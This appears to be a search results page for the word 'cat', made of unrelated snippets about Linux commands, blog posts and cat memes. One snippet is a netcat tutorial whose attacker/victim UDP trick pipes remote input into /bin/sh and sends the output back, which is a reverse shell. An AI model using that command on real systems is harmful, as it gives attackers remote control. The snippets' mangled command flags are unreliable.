About 975 results found.
Let’s share. ;D % cat /etc/os-release ID=gentoo PRETTY_NAME="Gentoo/Linux" ANSI_COLOR="1;32" HOME_URL="http://www.gentoo.org/" SUPPORT_URL="http://www.gentoo.org/main/en/support.xml" BUG_REPORT_URL="https://bugs.gentoo.org/" % rc --version rc (OpenRC) 0.17 (Gentoo Linux) Anyway, let’s continue $ machinectl shell Connected to the local host.
For now, we will just add the compress_tar option, and add more options later when needed. $ cat > rbm.conf < < END compress_tar: xz END The compress_tar options means that we want tarballs to be compressed using xz. Creating a new project We will now add the tor project.
tag=unmuted.popular.1.48 rimgo Legend is not ready to be a dad Aug 18, 2024 2:00 PM tampacl 197873 418 7 Next > funny cute aww cat unmuted Comments (23) TheUnstoppableWampas Well the cat version of being a father is fucking off, so he sure seems ready. 7 months ago | 101 0 vakler What a way to find out I'm half cat.
Send and receive files Receive a file : nc unlvv p 2929 > filename Send a file : cat file | nc unvv ip_address 2929 Communicating through UDP channels UDP version of this trick uses two UDP ports On attacker – window 1 : nc lun p 2929 – window 2 : nc lun p 3939 On victim: echo “” | nc un ip 2929 | /bin/sh | nc -un ip_address 3939 Then, you can type commands in window 1 and see results on window 2 You can test this on your own computer.
Jun 23 Using lb to quickly improve my blogging speed! Default Runescape character to the rescue! Jun 20 My cat 😺 I have a cat. Jun 19 RSS created I created an RSS feed. Jun 18 Website created The birth of Jakes Thoughts! Word of the day! specillum See Stylet, 2.
As an example, you can do this by using the following shell script: # Send QUIT to NGINX master process to drain and exit NGINX_PID = $( cat /var/opt/gitlab/nginx/nginx.pid ) kill -QUIT $NGINX_PID # Wait for drain to complete while kill -0 $NGINX_PID 2>/dev/null ; do sleep 1 ; done # Stop NGINX service to prevent automatic restarts gitlab-ctl stop nginx Create an empty file at /etc/gitlab/skip-auto-reconfigure .
Taiki, the one who taught the cat how to handle the wind, there's Ryoko, who holds some love towards Mr. Taiki, as well as Jun, who is going to help Nao and Miki finding the flying cat again and there's Yukio, the wife of Mr.
Voyons comment extraire cette image initiale : mkdir initrd; cd initrd cat ../initrd.img | gunzip | cpio -vid Et voilà ! L'image de démarrage est un réalité un répertoire archivée avec cpio puis compressée avec gzip.
Die Zeile, die mit cat beginnt, kopiert das Intermediate-Zertifikat an das Ende des eigenen Zertifikats und die mit curl beginnende Zeile lädt die Datei herunter.
Another good reason to not run systemd ! Im running mxlinux with sysv init. ->cat /etc/machine-id cat: /etc/machine-id: No such file or directory 😊 Permalink 2 Rambler OP wrote on February 24, 2021 at 5:16 PM Awesome, I'll add that to the blog post.